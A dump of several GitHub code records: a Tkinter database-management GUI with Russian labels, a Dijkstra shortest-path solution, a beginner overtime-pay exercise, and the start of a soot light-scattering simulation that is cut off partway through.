Button(self.__frame_insert_btns, text='Удалить', font=('Comic Sans MS', 14), bg='red',\n fg='black', command=self.__delete_click, width=1290 // 34 + 1)\n self.__update_btn = Button(self.__frame_insert_btns, text='Обновить', font=('Comic Sans MS', 14),\n bg='white', fg='blue', command=self.__update_click, width=1290 // 34 + 1)\n\n # ================Initializing LogInFrame================\n\n self.__frame_log_in = Frame(self)\n\n self.__frame_input = Frame(self.__frame_log_in)\n self.__frame_input.pack_propagate(False)\n self.__host_lbl = Label(self.__frame_input, text='Enter host:', font=('Comic Sans MS', 10))\n self.__input_host = Entry(self.__frame_input, width=40, font=('Comic Sans MS', 10))\n self.__input_host.insert('end', str(CONN_INFO['HOST']))\n self.__port_lbl = Label(self.__frame_input, text='Enter port:', font=('Comic Sans MS', 10))\n self.__input_port = Entry(self.__frame_input, width=40, font=('Comic Sans MS', 10))\n self.__input_port.insert('end', str(CONN_INFO['PORT']))\n self.__user_lbl = Label(self.__frame_input, text='Enter user:', font=('Comic Sans MS', 10))\n self.__input_user = Entry(self.__frame_input, width=40, font=('Comic Sans MS', 10))\n self.__input_user.insert('end', str(CONN_INFO['USER']))\n self.__password_lbl = Label(self.__frame_input, text='Enter password:', font=('Comic Sans MS', 10))\n self.__input_password = Entry(self.__frame_input, width=40, show='*', font=('Comic Sans MS', 10))\n self.__input_password.insert('end', str(CONN_INFO['PASSWORD']))\n self.__select_db = Combobox(self.__frame_input, width=39, font=('Comic Sans MS', 10))\n self.__set_db_values()\n self.__db_lbl = Label(self.__frame_input, text='Enter database:', font=('Comic Sans MS', 10))\n self.__input_db = Entry(self.__frame_input, width=40, font=('Comic Sans MS', 10))\n self.__input_db.insert('end', str(CONN_INFO['DATABASE']))\n self.__var_check = BooleanVar()\n self.__check_select_db = Checkbutton(self.__frame_input, text='Выбрать базу данных',\n variable=self.__var_check, command=self.__on_change_check)\n self.__frame_login_btns = Frame(self.__frame_input)\n self.__connect_btn = Button(self.__frame_login_btns, text='Подключиться', bg='#28A745',\n font=('Comic Sans MS', 14), fg='white', command=self.__connect_click)\n self.__quit_login_btn = Button(self.__frame_login_btns, text='Выйти', bg='#E6676B',\n font=('Comic Sans MS', 14), command=self.__quit_click)\n\n self.__grid_log_in_frame()\n except Exception as e:\n mb.showerror(str(e), str(e.args))\n\n # ==========================================================\n\n # self.geometry('1280x720') # размер окна\n # self.__txt = Entry(self, width=10) # создание поля ввода информации\n # self.__txt.grid(column=1, row=0)\n\n # ==========================================================\n\n def __grid_log_in_frame(self):\n\n self.title('Log in')\n\n self.__pack_forget(True)\n\n # ================Griding LogInFrame================\n\n for child in self.__frame_input.winfo_children():\n child.grid_configure(padx=5, pady=5)\n for child in self.__frame_login_btns.winfo_children():\n child.grid_configure(padx=10)\n self.__host_lbl.grid(column=0, row=0)\n self.__input_host.grid(column=1, row=0)\n self.__port_lbl.grid(column=0, row=1)\n self.__input_port.grid(column=1, row=1)\n self.__user_lbl.grid(column=0, row=2)\n self.__input_user.grid(column=1, row=2)\n self.__password_lbl.grid(column=0, row=3)\n self.__input_password.grid(column=1, row=3)\n self.__check_select_db.grid(column=1, row=4)\n self.__db_lbl.grid(column=0, row=5)\n self.__input_db.grid(column=1, row=5)\n self.__select_db.grid(column=1, row=5)\n self.__select_db.grid_forget()\n self.__connect_btn.grid(column=0, row=0)\n self.__quit_login_btn.grid(column=1, row=0)\n self.__frame_login_btns.grid(column=1, row=6)\n self.__frame_input.pack()\n self.__frame_log_in.update()\n pady = (int(self.winfo_width()) - int(self.__frame_log_in.winfo_reqwidth())) // 4\n padx = (int(self.winfo_height()) - int(self.__frame_log_in.winfo_reqheight())) // 4\n self.__frame_log_in.pack(fill='both', anchor='center', padx=padx, pady=pady)\n\n def __grid_db_frame(self):\n\n self.attributes(\n \"-fullscreen\",\n True\n )\n\n self.title('GameDev Application') # обновление названия приложения\n self.__pack_forget(False)\n self.__init_radio_btns()\n\n # ================Griding DBFrame================\n\n self.__radio_lbl.grid(column=0, row=0, sticky='w')\n for i in self.__radio_btns:\n i.grid(column=0, row=i['value'] + 1, sticky='w')\n for child in self.__frame_radio.winfo_children():\n child.grid_configure(padx=5, pady=2)\n self.__frame_radio.grid(row=0, column=0, sticky='nw', padx=10, pady=15)\n self.__table.pack(anchor='nw', fill='both')\n self.__frame_table.grid(row=0, column=1, pady=15)\n # self.__lbl.grid(row=0, column=0, sticky='w') # функция распределения объектов в форме\n # self.__btn_choose.grid(row=2, column=0, sticky='w')\n self.__btn_quit.pack(fill='both')\n # self.__combo.grid(row=1, column=0, sticky='w', pady=50)\n self.__frame_chosen_table.grid(row=0, column=2)\n self.__input_entries_text.grid(column=0, row=1, padx=5, pady=5)\n self.__frame_input_value.grid(row=1, column=1, sticky='w')\n self.__delete_btn.pack(side='left', fill='both')\n self.__insert_btn.pack(side='left', fill='both')\n self.__update_btn.pack(side='left', fill='both')\n self.__frame_insert_btns.grid(column=1, row=2)\n # self.__set_combo(values=self.__db.get_tables())\n # self.__set_table(columns=self.__db.get_columns(self.__combo.get()),\n # values=self.__db.get_values(self.__combo.get()))\n self.__frame_db.pack(fill='both')\n\n def __init_radio_btns(self):\n\n # ================Initializing Radiobutton================\n\n index: int = 0\n for i in self.__db.get_tables():\n self.__radio_btns.append(\n Radiobutton(\n self.__frame_radio,\n text=i,\n variable=self.__r_var,\n value=index,\n command=self.__choose_table_click\n )\n )\n self.__input_entries[i] = []\n self.__input_entries_lbls[i] = []\n index += 1\n\n def __pack_forget(self, db: bool):\n\n temp: Frame\n if db:\n temp = self.__frame_db\n else:\n temp = self.__frame_log_in\n for i in temp.winfo_children():\n for j in i.winfo_children():\n for k in j.winfo_children():\n k.pack_forget()\n j.pack_forget()\n i.pack_forget()\n temp.pack_forget()\n\n def __choose_table_click(self):\n # self.__set_table(columns=self.__db.get_columns(self.__combo.get()),\n # values=self.__db.get_values(self.__combo.get()))\n\n self.__input_values['values'] = []\n self.__column_types = {}\n self.__input_values['names'] = []\n res_columns = self.__db.get_columns(self.__radio_btns[self.__r_var.get()]['text'])\n res_values = self.__db.get_values(self.__radio_btns[self.__r_var.get()]['text'])\n index: int = 0\n self.__columns[self.__radio_btns[self.__r_var.get()]['text']] = res_columns['columns']\n for i in res_columns['types']:\n self.__column_types[res_columns['columns'][index]] = i\n index += 1\n self.__set_table(columns=res_columns['columns'],\n values=res_values)\n\n # ================Initializing Entries================\n\n if self.__input_entries[str(self.__radio_btns[self.__old_r_var.get()]['text'])]:\n for i in self.__input_entries[str(self.__radio_btns[self.__old_r_var.get()]['text'])]:\n i.grid_forget()\n\n if self.__input_entries_lbls[str(self.__radio_btns[self.__old_r_var.get()]['text'])]:\n for i in self.__input_entries_lbls[str(self.__radio_btns[self.__old_r_var.get()]['text'])]:\n i.grid_forget()\n\n if not self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']]:\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']] = []\n self.__input_entries_lbls[self.__radio_btns[self.__r_var.get()]['text']] = []\n\n for i in self.__input_values['names']:\n if 'id' in i[:4]:\n table_exist: bool = True\n if not self.__radio_btns[self.__r_var.get()]['text'] == i[3:] + 's' and \\\n not self.__radio_btns[self.__r_var.get()]['text'] == i[3:] + 'es':\n flag: bool = False\n try:\n need_to_create: bool = True\n for j in tuple(self.__db.get_values(i[3:] + 's')):\n if need_to_create:\n self.__input_values_mul[i[3:] + 's'] = ()\n need_to_create = False\n for k in j:\n if type(k) is str:\n self.__input_values_mul[i[3:] + 's'] += (k,)\n break\n except DatabaseError:\n flag = True\n if flag:\n try:\n need_to_create: bool = True\n for j in tuple(self.__db.get_values(i[3:] + 'es')):\n if need_to_create:\n self.__input_values_mul[i[3:] + 'es'] = ()\n need_to_create = False\n for k in j:\n if type(k) is str:\n self.__input_values_mul[i[3:] + 'es'] += (k,)\n break\n except DatabaseError:\n table_exist = False\n pass\n if table_exist:\n try:\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n Combobox(self.__frame_input_value, values=self.__input_values_mul[i[3:] + 's'],\n font=('Arial', 8))\n )\n except KeyError:\n try:\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n Combobox(self.__frame_input_value, values=self.__input_values_mul[i[3:] + 'es'],\n font=('Arial', 8))\n )\n except KeyError:\n if flag:\n mb.showwarning('DB is empty', 'Your table \\'' + i[3:]\n + 'es\\' is empty, write some records in tables where don\\'t open'\n 'this window to use this app and after reboot it')\n else:\n mb.showwarning('DB is empty', 'Your table \\'' + i[3:]\n + 's\\' is empty, write some records in tables where don\\'t open'\n 'this window to use this app and after reboot it')\n else:\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n Entry(self.__frame_input_value, width=len(i), font=('Arial', 8))\n )\n else:\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n Entry(self.__frame_input_value, width=len(i), font=('Arial', 8))\n )\n elif 'id' in i:\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n Entry(self.__frame_input_value, width=len(i) * 2, font=('Arial', 8))\n )\n elif 'name' in i or 'date' in i:\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n Entry(self.__frame_input_value, width=len(i) * 2, font=('Arial', 8))\n )\n elif 'login' in i or 'password' in i or 'patronymic' in i:\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n Entry(self.__frame_input_value, width=len(i) * 3, font=('Arial', 8))\n )\n elif 'path' in i[len(i) - 7:] or 'file' in i[len(i) - 7:]:\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n Button(\n self.__frame_input_value,\n width=len(i) * 2,\n font=('Arial', 8),\n text='Выбрать файл',\n command=self.__choose_file\n )\n )\n else:\n if self.__column_types[i] == 'bit(1)':\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(\n Combobox(self.__frame_input_value, values=('Да', 'Нет'), font=('Arial', 8))\n )\n else:\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']].append(Entry(\n self.__frame_input_value, width=len(i) * 5, font=('Arial', 8))\n )\n self.__input_entries_lbls[self.__radio_btns[self.__r_var.get()]['text']].append(\n Label(self.__frame_input_value, text=i, font=('Arial', 8))\n )\n\n index = 0\n for i in self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']]:\n i.grid(column=index + 1, row=1, padx=5, pady=2)\n index += 1\n\n index = 0\n for i in self.__input_entries_lbls[self.__radio_btns[self.__r_var.get()]['text']]:\n i.grid(column=index + 1, row=0, padx=5, pady=2, sticky='w')\n index += 1\n\n self.__old_r_var.set(self.__r_var.get())\n\n def __select_table_item(self, _):\n self.__input_values['values'] = []\n self.__path_to_file = ''\n cur_item = self.__table.focus()\n values_item = self.__table.item(cur_item)['values']\n index: int = 0\n for i in values_item:\n if type(self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']][index]) is Button:\n self.__path_to_file = i\n else:\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']][index].delete(0, 'end')\n self.__input_entries[self.__radio_btns[self.__r_var.get()]['text']][index].insert('end', i)\n self.__input_values['values'].append(i)\n index += 1\n self.__old_record = self.__reformat_input_values(True)\n self.__update_old_file()\n pass\n # print(self.__input_values)\n\n # def __set_combo(self, values: tuple):\n # self.__combo['values'] = values\n # self.__combo.current(0) # установите вариант по умолчанию\n\n def __set_table(self, columns: tuple, values: list):\n self.__table.delete(*self.__table.get_children())\n self.__table.configure(columns=columns, show='headings', selectmode='extended')\n for i in columns:\n if 'id' in i[:4]:\n if self.__radio_btns[self.__r_var.get()]['text'] == i[3:] + 's' or \\\n self.__radio_btns[self.__r_var.get()]['text'] == i[3:] + 'es':\n self.__table.heading(column=i, text='№')\n self.__table.column(i, minwidth=0, width=len(i) * 8, stretch=False)\n else:\n self.__table.heading(column=i, text=i[3:])\n self.__table.column(i, minwidth=0, width=len(i) * 15, stretch=False)\n elif 'name' in i or 'date' in i or 'patronymic' in i:\n if 'name' in i:\n self.__table.heading(column=i, text=i[:len(i) - 5])\n elif 'date' in i:\n self.__table.heading(column=i, text=i[len(i) - 4:])\n else:\n self.__table.heading(column=i, text=i)\n self.__table.column(i, minwidth=0, width=len(i) * 15, stretch=False)\n elif 'log' in i or 'password' in i:\n self.__table.heading(column=i, text=i)\n self.__table.column(i, minwidth=0, width=len(i) * 30, stretch=False)\n else:\n self.__table.heading(column=i, text=i)\n self.__table.column(i, minwidth=0, width=len(i) * 50, stretch=False)\n self.__input_values['names'].append(i)\n index: int\n number: int = 1\n for value in values:\n index = 0\n input_values_mul: tuple = ()\n for i in value:\n if 'id' in columns[index][:4]:\n if not self.__radio_btns[self.__r_var.get()]['text'] == columns[index][3:] + 's' and \\\n not self.__radio_btns[self.__r_var.get()]['text'] == columns[index][3:] + 'es':\n flag: bool = False\n try:\n next_step: bool = True\n for j in tuple(self.__db.get_values(columns[index][3:] + 's')):\n if next_step:\n if j[0] == i:\n for k in j:\n if type(k) is str:\n input_values_mul += (k,)\n next_step = False\n break\n except DatabaseError:\n flag = True\n if flag:\n try:\n next_step: bool = True\n for j in tuple(self.__db.get_values(columns[index][3:] + 'es')):\n if next_step:\n if j[0] == i:\n for k in j:\n if type(k) is str:\n input_values_mul += (k,)\n next_step = False\n break\n except DatabaseError:\n pass\n elif self.__column_types[columns[index]] == 'bit(1)':\n if i[0]:\n temp = list(value)\n temp[index] = 'Да'\n value = tuple(temp)\n else:\n temp = list(value)\n temp[index] = 'Нет'\n value = tuple(temp)\n pass\n index += 1\n\n self.__table.insert(\"\", 'end', values=(number,) + input_values_mul + value[1 + len(input_values_mul):])\n number += 1\n\n def __on_change_check(self):\n if self.__var_check.get():\n self.__db_lbl.config(text='Choose database:')\n self.__input_db.grid_forget()\n self.__select_db.grid(column=1, row=5)\n else:\n self.__select_db.grid_forget()\n self.__db_lbl.config(text='Entry database:')\n self.__input_db.grid(column=1, row=5)\n pass\n\n def __connect_click(self):\n try:\n CONN_INFO['HOST'] = self.__input_host.get()\n CONN_INFO['PORT'] = int(self.__input_port.get())\n CONN_INFO['USER'] = self.__input_user.get()\n CONN_INFO['PASSWORD'] = self.__input_password.get()\n if self.__var_check.get():\n CONN_INFO['DATABASE'] = self.__select_db.get()\n else:\n CONN_INFO['DATABASE'] = self.__input_db.get()\n\n self.__db = DataBase()\n if self.__db.is_connect():\n self.__grid_db_frame()\n\n except DatabaseError and RuntimeError and ConnectionRefusedError and OperationalError:\n mb.showerror('Wrong database info', 'Database connection error! Try entering other data.')\n\n def __insert_click(self):\n table = self.__radio_btns[self.__r_var.get()]['text']\n try:\n if self.__need_to_upload_file:\n self.__upload_file()\n values = self.__reformat_input_values(False)\n self.__db.input_value(\n table=table,\n columns=tuple(self.__columns[table][1:]),\n values=values,\n types=self.__column_types\n )\n res_columns = self.__db.get_columns(self.__radio_btns[self.__r_var.get()]['text'])\n res_values = self.__db.get_values(self.__radio_btns[self.__r_var.get()]['text'])\n self.__set_table(columns=res_columns['columns'],\n values=res_values)\n if self.__need_to_upload_file:\n self.__update_old_file()\n self.__need_to_upload_file = False\n except DatabaseError as e:\n mb.showerror('DatabaseError', 'Something went wrong...\\n' + str(e.args))\n pass\n\n def __delete_click(self):\n table = self.__radio_btns[self.__r_var.get()]['text']\n values = self.__reformat_input_values(True)\n try:\n self.__db.delete_value(\n table=table,\n columns=tuple(self.__columns[table][1:]),\n values=values,\n types=self.__column_types\n )\n if not self.__path_to_file == '':\n self.__delete_file()\n res_columns = self.__db.get_columns(self.__radio_btns[self.__r_var.get()]['text'])\n res_values = self.__db.get_values(self.__radio_btns[self.__r_var.get()]['text'])\n self.__set_table(columns=res_columns['columns'],\n values=res_values)\n except DatabaseError as e:\n mb.showerror('DatabaseError', 'Something went wrong...\\n' + str(e.args))\n pass\n\n def __update_click(self):\n table = self.__radio_btns[self.__r_var.get()]['text']\n try:\n if self.__need_to_upload_file:\n self.__upload_file()\n self.__delete_old_file()\n self.__need_to_upload_file = False\n values = self.__reformat_input_values(True)\n self.__db.update_value(\n table=table,\n columns=tuple(self.__columns[table][1:]),\n values=values,\n types=self.__column_types,\n old_values=self.__old_record\n )\n res_columns = self.__db.get_columns(self.__radio_btns[self.__r_var.get()]['text'])\n res_values = self.__db.get_values(self.__radio_btns[self.__r_var.get()]['text'])\n self.__set_table(columns=res_columns['columns'],\n values=res_values)\n except DatabaseError as e:\n mb.showerror('DatabaseError', 'Something went wrong...\\n' + str(e.args))\n\n def __reformat_input_values(self, delete_update: bool) -> tuple:\n values: tuple = ()\n table = self.__radio_btns[self.__r_var.get()]['text']\n index: int = 0\n for i in self.__input_entries[table]:\n if not index == 0:\n if type(i) is Entry:\n if self.__column_types[self.__input_entries_lbls[table][index]['text']] == 'timestamp':\n if delete_update:\n values += (i.get().replace('\\'', '_').replace('\\\"', '_'),)\n else:\n values += (str(dt.now()),)\n else:\n values += (i.get().replace('\\'', '_').replace('\\\"', '_'),)\n elif type(i) is Button:\n values += (self.__path_to_file.replace('\\'', '_').replace('\\\"', '_'), )\n else:\n if self.__column_types[self.__input_entries_lbls[table][index]['text']] == 'bit(1)':\n if 'Да' in i.get():\n values += (str(1),)\n else:\n values += (str(0),)\n else:\n mul_table = self.__input_entries_lbls[table][index]['text']\n try:\n values += (\n str(\n [\n n for n, x in enumerate(\n self.__input_values_mul[mul_table[3:] + 's']\n ) if i.get() in x\n ].pop(0) + 1\n ),\n )\n except KeyError:\n values += (\n str(\n [\n n for n, x in enumerate(\n self.__input_values_mul[mul_table[3:] + 'es']\n ) if i.get() in x\n ].pop(0) + 1\n ),\n )\n index += 1\n return values\n\n def __choose_file(self):\n self.__update_old_file()\n self.__need_to_upload_file = True\n self.__path_to_file = fd.askopenfile()\n if self.__path_to_file is not None:\n self.__path_to_file = self.__path_to_file.name\n lst = self.__path_to_file.replace('\\\\', '/').split('/')\n self.__file_name = lst[len(lst) - 1]\n self.__update_file_name_entry()\n\n def __update_old_file(self):\n self.__old_path_to_file = self.__path_to_file\n index: int = 0\n table = self.__radio_btns[self.__r_var.get()]['text']\n for i in self.__input_entries_lbls[table]:\n if 'name' in i['text']:\n self.__old_file_name = self.__input_entries[table][index].get()\n break\n index += 1\n\n def __upload_file(self):\n table = self.__radio_btns[self.__r_var.get()]['text']\n directory = str(os.getcwd()) + '/' + table\n if not os.path.exists(directory):\n os.makedirs(str(directory))\n try:\n sh.copy(str(self.__path_to_file), directory)\n self.__path_to_file = directory.replace('\\\\', '/')\n except sh.SameFileError:\n name_lst = self.__file_name.split('.')\n index: int = 0\n self.__file_name = ''\n for i in name_lst:\n if not index + 1 == len(name_lst):\n self.__file_name += i\n else:\n self.__file_name += '(copy).' + i\n index += 1\n self.__update_file_name_entry()\n sh.copy(\n str(self.__path_to_file),\n directory + '/' + self.__file_name)\n self.__path_to_file = directory.replace('\\\\', '/')\n\n def __delete_old_file(self):\n if os.path.exists(self.__old_path_to_file + '/' + self.__old_file_name):\n os.remove(str(self.__old_path_to_file + '/' + self.__old_file_name))\n else:\n mb.showwarning('Something went wrong...',\n 'File' + self.__path_to_file + '/' + self.__file_name + 'not found...')\n self.__old_path_to_file = ''\n self.__old_file_name = ''\n\n def __delete_file(self):\n if os.path.exists(self.__path_to_file + '/' + self.__file_name):\n os.remove(self.__path_to_file + '/' + self.__file_name)\n else:\n mb.showwarning('Something went wrong...',\n 'File' + self.__path_to_file + '/' + self.__file_name + 'not found...')\n self.__path_to_file = ''\n self.__file_name = ''\n\n def __update_file_name_entry(self):\n index: int = 0\n table = self.__radio_btns[self.__r_var.get()]['text']\n for i in self.__input_entries_lbls[table]:\n if 'name' in i['text']:\n self.__input_entries[table][index].delete(0, 'end')\n self.__input_entries[table][index].insert('end', self.__file_name)\n break\n index += 1\n\n def __quit_click(self):\n question = mb.askokcancel('Quit', 'Are you sure?')\n if question:\n self.destroy()\n\n def __set_db_values(self, values: tuple = CONN_INFO['DATABASES']):\n self.__select_db['values'] = values\n self.__select_db.current(0) # установите вариант по умолчанию\n\n def start(self):\n self.mainloop()\n","repo_name":"PriFo/tkinter_app","sub_path":"DBWindow.py","file_name":"DBWindow.py","file_ext":"py","file_size_in_byte":34104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"12492267705","text":"import sys\r\nimport heapq\r\n\r\ninput = sys.stdin.readline\r\n\r\nN = int(input()) # 노드개수\r\nM = int(input()) # 간선개수\r\nlst = [[] for _ in range(N+1)]\r\ndis = [int(1e9)] * (N+1)\r\n\r\nfor _ in range(M):\r\n u,v,w = map(int, input().split())\r\n lst[u].append((v,w))\r\n\r\ns,e = map(int, input().split())\r\n\r\nq = [(s,0)]\r\ndis[s] = 0\r\n\r\nwhile q:\r\n n, v = heapq.heappop(q)\r\n\r\n if dis[n] >= v:\r\n for node, V in lst[n]:\r\n tmp = V + v\r\n if tmp < dis[node]:\r\n dis[node] = tmp\r\n heapq.heappush(q, (node, tmp))\r\n\r\nprint(dis[e])","repo_name":"song7351/baekjoonhub","sub_path":"백준/Gold/1916. 최소비용 구하기/최소비용 구하기.py","file_name":"최소비용 구하기.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"38266801364","text":"\n\n\n\n# Make a Program.\n# If someone works over 40 hours, add message they are due overtime\n# Add message of the wage\n# Overtime = 110% of the standard wage\n\nwage = 10\nhours_worked = 50\n\ninput(\"Please enter your wage: \")\ninput(\"Please enter the total hours you worked this week: \")\n\ntotal_regular_pay = wage * hours_worked\novertime_wage = wage * 1.10\n\nif hours_worked > 40:\n overtime_hours = hours_worked - 40\n overtime_amount = hours_worked * overtime_wage\n total_pay = total_regular_pay + overtime_amount\n print('You have worked more then 40 hours this week.')\n print(f'You have earned the overtime amount of {overtime_amount}')\n print(f'Your total pay is {total_pay}')\nelse:\n print(f\"You have earned {total_regular_pay}\")\n\n\n\n\n","repo_name":"Shelby86/Python_Work","sub_path":"day1_5.py","file_name":"day1_5.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"11779772934","text":"# Programmed by Keyhan Babaee Under Prof. Steven Rogak supervision, https://github.com/KeyhanB\n# Version 1.4\n# June 2019\nimport Functions as FN\nimport os\nimport numpy as np\nfrom math import pi\nfrom math import log\n\nimport logging\n\n####### Logging Parameters\nlogging.basicConfig(format='%(asctime)s, %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p', filename='Log.txt', level=logging.INFO, filemode='w')\n##############\n\nif __name__ == \"__main__\":\n\n logging.info(\"Program Started!\")\n script_dir = os.path.dirname(os.path.realpath('__file__'))\n Graph_Folder = \"Graph Output\"\n Results_Folder = \"Results\"\n\n ####################### Aggregate Distribution Setting\n\n Sample_Total_Number_Concentration = 5000 # Sample total concentration #/cm^3\n Sample_LogN_D_Median_Min = 150 # Smallest median diameter of computation (nm)\n Sample_LogN_D_Median_Max = 350 # Largest median diameter of computation (nm)\n Sample_LogN_D_Median_Bins = 1 # Number of the Steps\n\n Sample_LogN_Sigma_Min = 1.3 # Smallest Sample Sigma G\n Sample_LogN_Sigma_Max = 1.9 # Largest Sample Sigma G\n Sample_LogN_Sigma_Bins = 2 # Number of the Steps\n\n ####################### Aggregate Distribution bounds\n\n Sample_Sigma_Bound = 3 # Number of Sigma G to cover\n Sample_Sigma_Bins = 124 # Number of bins\n\n ####################### Effective Density\n\n Eff_dm_Min = 2.56 # Smallest mass mobility exponent for the result to be in kg/m^3\n Eff_dm_Max = 2.8 # Largest mass mobility exponent for the result to be in kg/m^3\n Eff_dm_Bins = 1 # Number of bins\n\n ####################### Effective Density for 100nm aggregate\n\n Eff_rho_100nm_Min = 502 # Smallest effective Density of 100nm aggregate in kg/m^3\n Eff_rho_100nm_Max = 650 # Largest effective Density of 100nm aggregate in kg/m^3\n Eff_rho_100nm_Bins = 1 # Number of bins\n\n Soot_Material_Density = 1800 # in kg/m^3\n\n ####################### Prefactor and projected area exponent of the aggregate\n\n Primary_D_Alpha = 1.1\n Primary_K_Alpha = 1.13\n\n #######################\n\n Primary_Sigma_da_CTE_Min = 1 # Smallest Sigma G around specific aggregate mobility diameter\n Primary_Sigma_da_CTE_Max = 1.4 # Largest Sigma G around specific aggregate mobility diameter\n Primary_Sigma_da_CTE_Bins = 2 # Number of bins\n\n ####################### Primary Particle size distrubution options\n\n Primary_Sigma_da_CTE_Bound = 3 # Number of Sigma G to cover\n Primary_Sigma_da_CTE_Nt = 75 + 1 # Number of bins\n\n ####################### Obsolete Varibales\n\n # Soot_Primary_Agg_dp_sigma = 1 # Geometric std of primary particles within aggregate\n # Primary_Betha = 0.9\n # Soot_Fractal_D_mc = 0.52 # Fractal Properties for continuum regime\n # Soot_Prefactor_k_mc = 0.85 + (0.03 * Soot_Primary_Agg_dp_sigma ** (4.4)) # Fractal continuum regime\n # Soot_Fractal_D_mc_RDG = 1 / Soot_Fractal_D_mc\n # Soot_Prefactor_k_mc_RDG = (Primary_Betha / Soot_Prefactor_k_mc) ** (1 / Soot_Fractal_D_mc)\n\n ####################### RDG Variables\n\n Soot_Fractal_D_mc_RDG = 1.78\n Soot_Prefactor_k_mc_RDG = 1.3\n\n ####################### Refractive index and Wave Parameters\n\n Soot_Refractive_Index = 2 - 1j # Complex refractive index\n Wave_Length = 870 * 1e-9 # nm\n Wave_Number = 2 * pi / Wave_Length # k\n Soot_Complex = (((Soot_Refractive_Index ** 2) - 1) / ((Soot_Refractive_Index ** 2) + 2))\n Soot_FM = (abs(Soot_Complex)) ** 2\n Soot_EM = Soot_Complex.imag\n\n ####################### Scattering Parameters\n\n Theta_Number = 180 # Number of bins in Theta\n Phi_Number = 180 # Number of bins in Phi\n Theta_Start = 0 # Angle Start for Theta\n Theta_Finish = pi # Angle Finish for Theta\n Phi_Start = 0 # Angle Start for Phi\n Phi_Finish = 2 * pi # Angle Finish for Phi\n Theta_Radian = np.linspace(Theta_Start, Theta_Finish, num=Theta_Number) # Theta List\n Phi_Radian = np.linspace(Phi_Start, Phi_Finish, Phi_Number) # Phi List\n Theta_Diff = abs((Theta_Finish - Theta_Start) / Theta_Number) # Delta Theta\n Phi_Diff = abs((Phi_Finish - Phi_Start) / Phi_Number) # Delta Phi\n # alpha=2*pi*radius/lambda\n\n ####################### Detail Figures\n\n Figure_Enable = 1 # 0 for disable and 1 for enable\n\n ####################### List Generation\n\n Sample_Sigma_List = np.linspace(Sample_LogN_Sigma_Min, Sample_LogN_Sigma_Max, num=Sample_LogN_Sigma_Bins)\n Sample_D_Median_List = np.linspace(Sample_LogN_D_Median_Min, Sample_LogN_D_Median_Max, num=Sample_LogN_D_Median_Bins)\n Eff_dm_List = np.linspace(Eff_dm_Min, Eff_dm_Max, num=Eff_dm_Bins)\n Eff_rho_100nm_List = np.linspace(Eff_rho_100nm_Min, Eff_rho_100nm_Max, num=Eff_rho_100nm_Bins)\n Primary_Sigma_da_CTE_List = np.linspace(Primary_Sigma_da_CTE_Min, Primary_Sigma_da_CTE_Max, num=Primary_Sigma_da_CTE_Bins)\n logging.info(\"Program Initiated!\")\n\n ####################### Plot options\n\n Sample_Diameter_Min = 50 # min diameter in nm for plotting\n Sample_Diameter_Max = 2100 # max diameter in nm for plotting\n Primary_Y_Min = 5 # in nm for plotting\n Primary_Y_Max = 50 # in nm for plotting\n\n ########### Labels\n\n X_LabelA1 = 'Mobility-equivalent Diameter (nm)'\n\n Y_LabelA1 = 'dN/dLogDm, (#/cm' + \"$^{}$\".format(3) + ')'\n Y_LabelA2 = \"Primary Particle Diameter-dp(nm)\"\n Y_LabelA3 = 'Absorption Cross Section(m' + \"$^{}$\".format(2) + '/dLogDm' + ')'\n Y_LabelA4 = \"Absorption Efficiency\"\n Y_LabelA5 = \"Scattering Efficiency\"\n Y_LabelA6 = 'Scattering Cross Section(m' + \"$^{}$\".format(2) + '/dLogDm' + ')'\n Y_LabelA7 = \"Sample Mass(kg/dLogDm)\"\n Y_LabelA8 = 'Effective Density (kg/m' + \"$^{}$\".format(3) + ')'\n Y_LabelA9 = \"SSA\"\n\n Y_LabelB1 = \"Aggregate Mass Average1\"\n Y_LabelB2 = \"Aggregate Mass Average2\"\n Y_LabelB3 = 'MAC(m' + \"$^{}$\".format(2) + '/g' + ')'\n Y_LabelB4 = 'MSC(m' + \"$^{}$\".format(2) + '/g' + ')'\n logging.info(\"Labels Created!\")\n\n ####################### Saving Parameters\n\n Save_Situation = []\n Save_Diameter = {}\n Save_LogN_Sample_SizeD = {}\n Save_Soot_Primary_Diameter_Median_Nano = {}\n Save_Absorption_Cross_Section_Sample_dlnDp = {}\n Save_Primary_Diameter_Bank = {}\n Save_Primary_Number_Bank = {}\n Save_Primary_Probability_Bank = {}\n Save_Absorption_Efficiency_Sample = {}\n Save_Differential_Scattering_Cross_Section_Full_dlnDp = {}\n Save_Scattering_Efficiency_Sample = {}\n Save_SSA_Distribution = {}\n Save_SSA = {}\n Save_Scattering_Cross_Section_Total_Distribution_dlnDp = {}\n Save_Effective_Density = {}\n Save_Mass_Sample_1 = {}\n Save_Mass_Sample_2 = {}\n Save_MAC = {}\n Save_MSC_Diff = {}\n Save_MAC_Distribution = {}\n Save_MSC_Distribution = {}\n Save_MSC_Total = {}\n Counter = 0\n\n ####################### Main Loops\n\n for i1 in range(Sample_LogN_D_Median_Bins): # Sample Median Loop\n for i2 in range(Sample_LogN_Sigma_Bins): # Sample Sigma Loop\n for i3 in range(Eff_dm_Bins): # Effective Density Dm Loop\n for i4 in range(Eff_rho_100nm_Bins): # Effective Density for 100nm aggregate Loop\n for i6 in range(Primary_Sigma_da_CTE_Bins): # 